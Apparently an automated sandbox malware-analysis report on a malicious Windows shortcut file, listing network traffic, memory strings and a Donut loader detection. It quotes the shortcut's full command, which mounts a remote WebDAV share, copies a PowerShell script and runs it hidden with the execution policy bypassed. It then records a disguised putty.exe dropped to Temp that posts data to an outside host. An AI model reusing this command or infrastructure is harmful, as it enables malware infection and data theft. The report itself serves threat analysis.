Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 44Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FW07QUAK775XPOAJPJTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12865Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NP9E13TDL7CB6FXGBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12101Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=31408WAQ67LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20411Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KWHIUOK86User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1161Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EUP7FGVZHMDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569445Host: immureprech.biz
Source: global traffic	HTTP traffic detected: GET /webdav/infrarecorder.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: todmeng.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /webdav/adv.ps1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: todmeng.com
Source: global traffic	HTTP traffic detected: GET /webdav/infrarecorder.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: todmeng.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /webdav/infrarecorder.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: todmeng.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: todmeng.com
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:19 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:21 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:23 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:25 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:27 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:29 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:29 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:31 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:33 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:36 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:38 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 15:43:40 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 274Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: putty.exe, 0000000D.00000000.1705659608.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000003.1795701119.0000000003190000.00000004.00000800.00020000.00000000.sdmp, putty.exe.11.dr	String found in binary or memory: http://infrarecorder.org
Source: putty.exe, 0000000D.00000000.1705659608.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmp, putty.exe, 0000000D.00000003.1795701119.0000000003190000.00000004.00000800.00020000.00000000.sdmp, putty.exe.11.dr	String found in binary or memory: http://infrarecorder.orgInfraRecorder
Source: powershell.exe, 0000000B.00000002.1770722325.000001B91DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90F378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90E023000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90F37E000.00000004.00000800.00020000.00000000.sdmp, putty.exe.11.dr	String found in binary or memory: http://ocsp.comodoca.com0&
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90EA63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90F356000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://todmeng.com
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90EA63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://todmeng.com/webdav/infrarecorder.exe
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: putty.exe, 0000000D.00000003.1896016137.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696513144932.12791&key=1696513144400700003.1&cta
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DE47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90EA63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/
Source: putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/_
Source: putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1895232262.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000002.1999856506.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: putty.exe, 0000000D.00000003.1895640137.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1895232262.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apiOiL6
Source: putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apilf
Source: putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apixpir6
Source: putty.exe, 0000000D.00000002.1999856506.0000000000B83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apiz_
Source: putty.exe, 0000000D.00000002.1999856506.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1989170343.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apizq
Source: putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/p
Source: putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/pig
Source: putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/pio
Source: putty.exe, 0000000D.00000002.2000058451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1988739451.0000000000C04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/ts
Source: putty.exe, 0000000D.00000003.1959137585.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1961112040.0000000003A28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz:443/api
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4ClZfC2k4pbW4ZbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000B.00000002.1770722325.000001B91DDE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1770722325.000001B91DCA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90F339000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com
Source: net.exe, 00000003.00000003.1351399766.000001D00EEEB000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1351399766.000001D00EEDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/
Source: net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/#
Source: net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/1ae33ca0e236cf5
Source: net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/C
Source: net.exe, 00000003.00000002.1521291382.000001D00EF6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/s
Source: net.exe, 00000003.00000002.1521291382.000001D00EF92000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1521291382.000001D00EF2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/webdav
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1740211550.000001B90DFF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com/webdav/infrarecorder.exe
Source: net.exe, 00000003.00000003.1351399766.000001D00EEEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.com:443/i
Source: powershell.exe, 0000000B.00000002.1740211550.000001B90DFF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://todmeng.comGetF
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_b07fa4138d6cee96061521c23bb7cd6608bee0c31ef2bfdc
Source: putty.exe, 0000000D.00000003.1897704518.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: putty.exe, 0000000D.00000003.1843957675.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1843870203.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.X-0EdX_w3eQf
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sfVXAKwWPXPT
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: putty.exe, 0000000D.00000003.1897259335.0000000003B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49877 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\putty.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: d2W4YpqsKg.lnk

LNK file: /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\%USERNAME%\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\%USERNAME%\Documents\adv.ps1

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_028C164D NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

13_2_028C164D

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_00343840: _memset,_memmove,DeviceIoControl,GetLastError,

13_2_00343840

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EB1348	11_2_00007FFB10EB1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EC1F7B	11_2_00007FFB10EC1F7B
